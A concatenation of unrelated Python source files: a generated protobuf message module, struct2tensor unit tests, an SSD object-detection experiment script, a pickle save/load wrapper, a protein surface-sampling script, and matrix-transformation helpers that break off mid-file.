filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mapInfo', full_name='nested.q2b.mapInfo', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attachInfo', full_name='nested.q2b.attachInfo', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1812,
serialized_end=1865,
)
_NESTED_JUDGETIMING = _descriptor.Descriptor(
name='JudgeTiming',
full_name='nested.JudgeTiming',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='extInfo', full_name='nested.JudgeTiming.extInfo', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appid', full_name='nested.JudgeTiming.appid', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='factType', full_name='nested.JudgeTiming.factType', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='nested.JudgeTiming.duration', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reportTime', full_name='nested.JudgeTiming.reportTime', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='afterCertify', full_name='nested.JudgeTiming.afterCertify', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appType', full_name='nested.JudgeTiming.appType', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='scene', full_name='nested.JudgeTiming.scene', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='totalTime', full_name='nested.JudgeTiming.totalTime', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='launchId', full_name='nested.JudgeTiming.launchId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='via', full_name='nested.JudgeTiming.via', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='AdsTotalTime', full_name='nested.JudgeTiming.AdsTotalTime', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hostExtInfo', full_name='nested.JudgeTiming.hostExtInfo', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1868,
serialized_end=2129,
)
_NESTED_GETAPPINFOBYLINK = _descriptor.Descriptor(
name='GetAppInfoByLink',
full_name='nested.GetAppInfoByLink',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='link', full_name='nested.GetAppInfoByLink.link', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='linkType', full_name='nested.GetAppInfoByLink.linkType', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2131,
serialized_end=2181,
)
_NESTED = _descriptor.Descriptor(
name='nested',
full_name='nested',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[_NESTED_A, _NESTED_B, _NESTED_JUDGETIMINGBUSIBUFF, _NESTED_GETAPPINFOBYLINKBUSIBUFF, _NESTED_USEUSERAPP, _NESTED_CHANNELINFO, _NESTED_USEUSERAPPBUSIBUFF, _NESTED_GETCODEBUSIBUFF, _NESTED_GETAPPINFOBYID, _NESTED_GETAPPINFOBYIDBUSIBUFF, _NESTED_D, _NESTED_C0011A, _NESTED_Q2B, _NESTED_JUDGETIMING, _NESTED_GETAPPINFOBYLINK, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=15,
serialized_end=2181,
)
_NESTED_A.containing_type = _NESTED
_NESTED_B.containing_type = _NESTED
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['busiBuff'].message_type = _NESTED_JUDGETIMING
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_JUDGETIMINGBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_JUDGETIMINGBUSIBUFF.containing_type = _NESTED
_NESTED_GETAPPINFOBYLINKBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETAPPINFOBYLINKBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETAPPINFOBYLINKBUSIBUFF.containing_type = _NESTED
_NESTED_USEUSERAPP.fields_by_name['channelInfo'].message_type = _NESTED_CHANNELINFO
_NESTED_USEUSERAPP.containing_type = _NESTED
_NESTED_CHANNELINFO.containing_type = _NESTED
_NESTED_USEUSERAPPBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_USEUSERAPPBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_USEUSERAPPBUSIBUFF.containing_type = _NESTED
_NESTED_GETCODEBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETCODEBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETCODEBUSIBUFF.containing_type = _NESTED
_NESTED_GETAPPINFOBYID.containing_type = _NESTED
_NESTED_GETAPPINFOBYIDBUSIBUFF.fields_by_name['loginSig'].message_type = _NESTED_C0011A
_NESTED_GETAPPINFOBYIDBUSIBUFF.fields_by_name['Crypto'].message_type = _NESTED_B
_NESTED_GETAPPINFOBYIDBUSIBUFF.containing_type = _NESTED
_NESTED_D.fields_by_name['Extinfo'].message_type = _NESTED_A
_NESTED_D.containing_type = _NESTED
_NESTED_C0011A.fields_by_name['Extinfo'].message_type = _NESTED_A
_NESTED_C0011A.containing_type = _NESTED
_NESTED_Q2B.fields_by_name['mapInfo'].message_type = _NESTED_A
_NESTED_Q2B.containing_type = _NESTED
_NESTED_JUDGETIMING.fields_by_name['extInfo'].message_type = _NESTED_Q2B
_NESTED_JUDGETIMING.containing_type = _NESTED
_NESTED_GETAPPINFOBYLINK.containing_type = _NESTED
DESCRIPTOR.message_types_by_name['nested'] = _NESTED
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
nested = _reflection.GeneratedProtocolMessageType('nested', (_message.Message,), {
'a' : _reflection.GeneratedProtocolMessageType('a', (_message.Message,), {
'DESCRIPTOR' : _NESTED_A,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.a)
})
,
'b' : _reflection.GeneratedProtocolMessageType('b', (_message.Message,), {
'DESCRIPTOR' : _NESTED_B,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.b)
})
,
'JudgeTimingBusiBuff' : _reflection.GeneratedProtocolMessageType('JudgeTimingBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_JUDGETIMINGBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.JudgeTimingBusiBuff)
})
,
'GetAppInfoByLinkBusiBuff' : _reflection.GeneratedProtocolMessageType('GetAppInfoByLinkBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYLINKBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByLinkBusiBuff)
})
,
'UseUserApp' : _reflection.GeneratedProtocolMessageType('UseUserApp', (_message.Message,), {
'DESCRIPTOR' : _NESTED_USEUSERAPP,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.UseUserApp)
})
,
'channelInfo' : _reflection.GeneratedProtocolMessageType('channelInfo', (_message.Message,), {
'DESCRIPTOR' : _NESTED_CHANNELINFO,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.channelInfo)
})
,
'UseUserAppBusiBuff' : _reflection.GeneratedProtocolMessageType('UseUserAppBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_USEUSERAPPBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.UseUserAppBusiBuff)
})
,
'GetCodeBusiBuff' : _reflection.GeneratedProtocolMessageType('GetCodeBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETCODEBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetCodeBusiBuff)
})
,
'GetAppInfoById' : _reflection.GeneratedProtocolMessageType('GetAppInfoById', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYID,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoById)
})
,
'GetAppInfoByIdBusiBuff' : _reflection.GeneratedProtocolMessageType('GetAppInfoByIdBusiBuff', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYIDBUSIBUFF,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByIdBusiBuff)
})
,
'd' : _reflection.GeneratedProtocolMessageType('d', (_message.Message,), {
'DESCRIPTOR' : _NESTED_D,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.d)
})
,
'C0011a' : _reflection.GeneratedProtocolMessageType('C0011a', (_message.Message,), {
'DESCRIPTOR' : _NESTED_C0011A,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.C0011a)
})
,
'q2b' : _reflection.GeneratedProtocolMessageType('q2b', (_message.Message,), {
'DESCRIPTOR' : _NESTED_Q2B,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.q2b)
})
,
'JudgeTiming' : _reflection.GeneratedProtocolMessageType('JudgeTiming', (_message.Message,), {
'DESCRIPTOR' : _NESTED_JUDGETIMING,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.JudgeTiming)
})
,
'GetAppInfoByLink' : _reflection.GeneratedProtocolMessageType('GetAppInfoByLink', (_message.Message,), {
'DESCRIPTOR' : _NESTED_GETAPPINFOBYLINK,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested.GetAppInfoByLink)
})
,
'DESCRIPTOR' : _NESTED,
'__module__' : 'root_pb2'
# @@protoc_insertion_point(class_scope:nested)
})
_sym_db.RegisterMessage(nested)
_sym_db.RegisterMessage(nested.a)
_sym_db.RegisterMessage(nested.b)
_sym_db.RegisterMessage(nested.JudgeTimingBusiBuff)
_sym_db.RegisterMessage(nested.GetAppInfoByLinkBusiBuff)
_sym_db.RegisterMessage(nested.UseUserApp)
_sym_db.RegisterMessage(nested.channelInfo)
_sym_db.RegisterMessage(nested.UseUserAppBusiBuff)
_sym_db.RegisterMessage(nested.GetCodeBusiBuff)
_sym_db.RegisterMessage(nested.GetAppInfoById)
_sym_db.RegisterMessage(nested.GetAppInfoByIdBusiBuff)
_sym_db.RegisterMessage(nested.d)
_sym_db.RegisterMessage(nested.C0011a)
_sym_db.RegisterMessage(nested.q2b)
_sym_db.RegisterMessage(nested.JudgeTiming)
_sym_db.RegisterMessage(nested.GetAppInfoByLink)
# @@protoc_insertion_point(module_scope)
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for struct2tensor.broadcast."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from struct2tensor import create_expression
from struct2tensor import path
from struct2tensor.expression_impl import size
from struct2tensor.test import expression_test_util
from struct2tensor.test import prensor_test_util
import tensorflow as tf
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
@test_util.run_all_in_graph_and_eager_modes
class SizeTest(tf.test.TestCase):
def test_size_anonymous(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root, new_path = size.size_anonymous(expr, path.Path(["doc", "bar"]))
new_field = new_root.get_descendant_or_error(new_path)
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 2, 1])
def test_size(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.size(expr, path.Path(["doc", "bar"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 2, 1])
def test_size_missing_value(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.size(expr, path.Path(["doc", "keep_me"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [1, 1, 0])
def test_has(self):
expr = create_expression.create_expression_from_prensor(
prensor_test_util.create_big_prensor())
new_root = size.has(expr, path.Path(["doc", "keep_me"]), "result")
new_field = new_root.get_descendant_or_error(path.Path(["doc", "result"]))
leaf_node = expression_test_util.calculate_value_slowly(new_field)
self.assertAllEqual(leaf_node.parent_index, [0, 1, 2])
self.assertAllEqual(leaf_node.values, [True, True, False])
if __name__ == "__main__":
absltest.main()
|
# coding: utf-8
from keras.applications.imagenet_utils import preprocess_input
from keras.preprocessing import image
from scipy.misc import imread
import tensorflow as tf
from keras import backend as K
import time
from plot_util import *
from flow_util import *
from ssd_v2 import SSD300v2
from ssd_conv4_3 import SSD300_conv4_3
from ssd_utils import BBoxUtility
voc_classes = ['Aeroplane', 'Bicycle', 'Bird', 'Boat', 'Bottle',
'Bus', 'Car', 'Cat', 'Chair', 'Cow', 'Diningtable',
'Dog', 'Horse', 'Motorbike', 'Person', 'Pottedplant',
'Sheep', 'Sofa', 'Train', 'Tvmonitor']
NUM_CLASSES = len(voc_classes) + 1
network_size = 1024
batch_size = 2
input_shape = (network_size, network_size, 3)
colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()
use_feature_flow = True
use_dump_file = False
plot_activation_enable = False
#image_files = ['/home/cory/cedl/vid/videos/vid04/0270.jpg', '/home/cory/cedl/vid/videos/vid04/0275.jpg']
#image_files = ['/home/cory/KITTI_Dataset/data_tracking_image_2/training/image_02/0000/000015.png',
# '/home/cory/KITTI_Dataset/data_tracking_image_2/training/image_02/0000/000018.png']
# magic case: vid04 270 - 299
# image_files = ['/home/cory/ssd_keras/GTAV/GD1015.png', '/home/cory/ssd_keras/GTAV/GD1020.png']
image_files = ['/home/cory/ssd_keras/GTAV/GD1293.png', '/home/cory/ssd_keras/GTAV/GD1295.png']
# '/home/cory/ssd_keras/GTAV/GD21.png'
# '/home/cory/cedl/vid/videos/vid04/1000.jpg'
def get_detections(result):
detections = map(lambda r: {'label': r[0],
'conf': r[1],
'xmin': r[2],
'ymin': r[3],
'xmax': r[4],
'ymax': r[5]},
result)
return detections
def get_layer_output(model, inputs, output_layer_name):
immediate_layer = K.function([model.input, K.learning_phase()],
[model.get_layer(name=output_layer_name).output])
output = immediate_layer([inputs, 1])[0]
return output
def get_layer_predict(model, input_layer_name, input_layer_feature):
immediate_layer = K.function([model.get_layer(name=input_layer_name), K.learning_phase()],
[model.output])
model_predict = immediate_layer([input_layer_feature, 1])[0]
return model_predict
def load_inputs(file_list):
inputs = []
images = []
for file in file_list:
img = image.load_img(file, target_size=(network_size, network_size))
inputs.append(image.img_to_array(img))
images.append(imread(file))
return inputs, images
def run_network(model, inputs):
time_begin = time.time()
predictions = model.predict(inputs, batch_size=batch_size, verbose=1)
time_elapsed = time.time() - time_begin
print('elapsed time {:0.4f} sec {:.4f} fps'.format(time_elapsed, batch_size / time_elapsed))
return predictions
def compare_model_layer(model1, input1, layer1, model2, input2, layer2, plot_activation_enable=False):
layer_output1 = get_layer_output(model=model1, inputs=input1, output_layer_name=layer1)
layer_output2 = get_layer_output(model=model2, inputs=input2, output_layer_name=layer2)
diff = (layer_output1 - layer_output2)
print('layer_output1 sum =', sum(layer_output1[0].ravel()))
print('layer_output2 sum =', sum(layer_output2[0].ravel()))
print('diff min={:f} max={:f} sum={:f}'.format(
min(np.absolute(diff).ravel()),
max(np.absolute(diff).ravel()),
sum(np.absolute(diff).ravel())))
eq = np.array_equal(layer_output1, layer_output2)
if eq:
print('equal')
else:
print('not equal')
if plot_activation_enable:
plot_feature_map(layer_output1[0], 'feature_map_1')
plot_feature_map(layer_output2[0], 'feature_map_2')
def plot_detections(image_list, detection_result):
# for each image
for i, img in enumerate(image_list):
detections = get_detections(detection_result[i])
detections = list(filter(lambda x: x['conf'] > 0.8, detections))
fig = imshow_fig(img, title='frame_{:d}'.format(i+1))
current_axis = fig.gca()
for det in detections:
xmin = int(round(det['xmin'] * img.shape[1]))
ymin = int(round(det['ymin'] * img.shape[0]))
xmax = int(round(det['xmax'] * img.shape[1]))
ymax = int(round(det['ymax'] * img.shape[0]))
conf = det['conf']
label = int(det['label'])
label_name = voc_classes[label - 1]
display_txt = '{:0.2f}, {}'.format(conf, label_name)
# print(display_txt)
coords = (xmin, ymin), xmax - xmin + 1, ymax - ymin + 1
color = colors[label]
current_axis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))
current_axis.text(xmin, ymin, display_txt, bbox={'facecolor': color, 'alpha': 0.5})
fig.show()
def feature_flow():
bbox_util = BBoxUtility(NUM_CLASSES)
raw_inputs, images = load_inputs(image_files)
inputs = preprocess_input(np.array(raw_inputs))
dump_activation_layer = 'conv4_2'
compare_layer_name = 'conv6_2'
print('dump_activation_layer', dump_activation_layer)
print('target_layer_name', compare_layer_name)
# normal SSD network
model1 = SSD300v2(input_shape, num_classes=NUM_CLASSES)
model1.load_weights('weights_SSD300.hdf5', by_name=True)
predictions = run_network(model1, inputs)
results = bbox_util.detection_out(predictions)
plot_detections(images, results)
# get dump layer's output (as input for flow network)
input_img2 = inputs[1:2, :, :, :]
layer_dump = get_layer_output(model=model1, inputs=input_img2, output_layer_name=dump_activation_layer)
print('layer_dump.shape = ', layer_dump.shape)
# flow (raw rgb)
flow_rgb = compute_flow(image_files[1], image_files[0])
print('flow.shape', flow_rgb.shape)
imshow_fig(cv2.cvtColor(draw_hsv(flow_rgb), cv2.COLOR_BGR2RGB), title='flow_rgb')
# flow (re-sized for feature map)
flow_feature = get_flow_for_filter(flow_rgb)
# imshow_fig(flow_feature[:, :, 0], title='flow_feature_y', cmap='gray')
# imshow_fig(flow_feature[:, :, 1], title='flow_feature_x', cmap='gray')
# warp image by flow_rgb
iimg1 = cv2.imread(image_files[0])
img_warp = warp_flow(iimg1, flow_rgb)
imshow_fig(cv2.cvtColor(img_warp, cv2.COLOR_BGR2RGB), title='frame_2_warp')
# shift feature
shifted_feature = shift_filter(layer_dump, flow_feature)
# flow net
model2 = SSD300_conv4_3((128, 128, 512), num_classes=NUM_CLASSES)
model2.load_weights('weights_SSD300.hdf5', by_name=True)
predictions = run_network(model2, shifted_feature)
results = bbox_util.detection_out(predictions)
plot_detections(images[1:2], results)
# get specific layer's output and compare them (for debugging)
compare_model_layer(model1, input_img2, compare_layer_name,
model2, shifted_feature, compare_layer_name,
True)
sess.close()
plt.show()
def get_flow_for_filter(flow):
filter_map_width = 128
flow_ratio_y = flow.shape[0] / filter_map_width
flow_ratio_x = flow.shape[1] / filter_map_width
flow_small = np.asarray([cv2.resize(flow[:, :, 0] / flow_ratio_y, (filter_map_width, filter_map_width)),
cv2.resize(flow[:, :, 1] / flow_ratio_x, (filter_map_width, filter_map_width))])
flow_small = flow_small.transpose([1, 2, 0])
print('flow_small.shape', flow_small.shape)
return flow_small
if __name__ == '__main__':
config = tf.ConfigProto(
device_count={'GPU': 1}
)
config.gpu_options.per_process_gpu_memory_fraction = 0.5
sess = tf.Session(config=config)
K.set_session(sess)
feature_flow()
|
"""
.. module:: PickleWrapper
:synopsis: Wrapper for cPickle object saving package
.. moduleauthor:: Ambra Demontis <ambra.demontis@unica.it>
.. moduleauthor:: Marco Melis <marco.melis@unica.it>
"""
import pickle
import gzip
from secml.utils import fm
# Remember to add any new method to following list
__all__ = ['save', 'load']
def save(file_path, obj):
"""Save object to file using cPickle.
This functions stores a generic python object into
a compressed gzip file (`*.gz`).
Saved objects can be loaded using `.load`.
Parameters
----------
file_path : str
Path to destination file.
obj : object
Any python object to save.
Returns
-------
obj_path : str
Full path to the stored object.
Notes
-----
Objects are stored using **protocol 4** data stream format.
For more information see
https://docs.python.org/3/library/pickle.html#data-stream-format
"""
# Adding extension to destination file if user forgot about it...
file_ext = fm.splitext(file_path)[1]
file_path = file_path + '.gz' if file_ext != '.gz' else file_path
# open the reference to target file
with gzip.open(file_path, 'wb') as f_ref:
pickle.dump(obj, f_ref, protocol=4)
return fm.join(fm.abspath(file_path), fm.split(file_path)[1])
def load(file_path, encoding='bytes'):
"""Load object from cPickle file.
Load a generic gzip compressed python object created by `.save`.
Parameters
----------
file_path : str
Path to target file to read.
encoding : str, optional
Encoding to use for loading the file. Default 'bytes'.
"""
with gzip.open(file_path, 'rb') as f_ref:
# Loading and returning the object
return pickle.load(f_ref, encoding=encoding)
|
#!/usr/bin/env python3
import argparse
import pygamer
import numpy as np
import pyvista as pv
import pyacvd
import vtk
from pathlib import Path
from lightdock.pdbutil.PDBIO import create_pdb_from_points
def parse_command_line():
"""Parses command line arguments"""
parser = argparse.ArgumentParser(prog='surface-sampler')
parser.add_argument("molecule", help="PDB file for input structure")
parser.add_argument("distance", type=float, default=10.0, help="Distance to surface")
parser.add_argument("points", type=int, default=400, help="Number of points to generate")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_command_line()
# Mesh the protein of interest
# mesh = pygamer.readPDB_molsurf(args.molecule)
mesh = pygamer.readPDB_gauss(args.molecule)
# Compute the normal orientation
components, orientable, manifold = mesh.compute_orientation()
mesh.correctNormals()
print(F"The mesh has {components} components, is"
F" {'orientable' if orientable else 'non-orientable'}, and is"
F" {'manifold' if manifold else 'non-manifold'}.")
meshes = mesh.splitSurfaces()
for i, m in enumerate(meshes):
print(F"Mesh {i} is {m.getVolume()} A^3 in volume.")
# Keep only the larger mesh
mesh = meshes[0]
for v in mesh.vertexIDs:
v.data().selected = True
# Apply 5 iterations of smoothing
mesh.smooth(max_iter=5, preserve_ridges=False, verbose=True)
for i in range(5):
# Coarsen dense regions of the mesh
mesh.coarse_dense(rate=2, numiter=3)
# Coarsen flat regions of the mesh
mesh.coarse_flat(rate=0.1, numiter=3)
mesh.smooth(max_iter=3, preserve_ridges=True, verbose=False)
print(F"Iteration {i+1}: {mesh.nVertices} vertices, {mesh.nEdges} edges, and {mesh.nFaces} faces.")
# Center mesh at 0,0,0
# center, radius = mesh.getCenterRadius()
# mesh.translate(-center)
# Set boundary markers of the mesh to 23
for faceID in mesh.faceIDs:
faceID.data().marker = 23
# Get the root metadata
gInfo = mesh.getRoot()
gInfo.ishole = True # Don't mesh the inside of
gInfo.marker = -1
path = Path(args.molecule)
obj_name = f'{path.stem}.obj'
pygamer.writeOBJ(obj_name, mesh)
# Pyvista
mesh = pv.read(obj_name)
shell = mesh.decimate(0.97, volume_preservation=True).extract_surface()
print(f'Decimation: {len(mesh.points)} -> {len(shell.points)}')
# warp each point by the normal vectors
for i in range(1,int(args.distance)+1):
print(f'Expanding: {i}')
shell = shell.compute_normals()
warp = vtk.vtkWarpVector()
warp.SetInputData(shell)
warp.SetInputArrayToProcess(0, 0, 0,
vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS,
vtk.vtkDataSetAttributes.NORMALS)
warp.SetScaleFactor(2)
warp.Update()
shell = pv.wrap(warp.GetOutput())
expanded_mesh = shell.extract_surface()
clus = pyacvd.Clustering(expanded_mesh)
clus.subdivide(3)
clus.cluster(args.points)
shell = clus.create_mesh().extract_surface()
uniform = shell
p = pv.Plotter(notebook=False, shape=(1,1))
p.add_mesh(shell)
p.add_points(np.asarray(uniform.points), color="r",
point_size=8.0, render_points_as_spheres=True)
p.add_mesh(expanded_mesh, smooth_shading=True)
p.link_views()
p.show_bounds()
p.show()
create_pdb_from_points(f'{path.stem}_swarms.pdb', uniform.points)
|
import numpy as np
from .contrib import transformations
from . import math_utils
def translation_matrix(offset):
mat = np.eye(4, dtype=offset.dtype)
mat[:3, 3] = offset
return mat
def apply_translation(mat, offset):
offset_mat = translation_matrix(offset)
print(offset, offset_mat)
mat[...] = np.dot(mat, offset_mat)
return mat
def scale_matrix(scale):
scale = np.asarray(scale)
if len(scale) <= 1:
scale = np.asarray([scale, scale, scale])
mat = np.eye(4, dtype=scale.dtype)
print(scale, mat)
mat[:3, :3] = np.diag(scale)
return mat
def apply_scale(mat, scale):
scale_mat = scale_matrix(scale)
mat[...] = np.dot(mat, scale_mat)
return mat
def x_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [1, 0, 0], point)
return rot_mat
def apply_x_rotation(mat, angle, point=None):
rot_mat = x_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def y_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [0, 1, 0], point)
return rot_mat
def apply_y_rotation(mat, angle, point=None):
rot_mat = y_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def z_rotation_matrix(angle, point=None):
rot_mat = transformations.rotation_matrix(angle, [0, 0, 1], point)
return rot_mat
def apply_z_rotation(mat, angle, point=None):
rot_mat = z_rotation_matrix(angle, point)
mat[...] = np.dot(mat, rot_mat)
return mat
def rotation_matrix(angle, axis, point=None):
rot_mat = transformations.rotation_matrix(angle, axis, point)
return rot_mat
def apply_rotation(mat, angle, axis, point=None):
rot_mat = rotation_matrix(angle, axis, point)
mat[...] = np.dot(mat, rot_mat)
return mat
class RotationMatrix(object):
"""A rotation represented by a matrix"""
@staticmethod
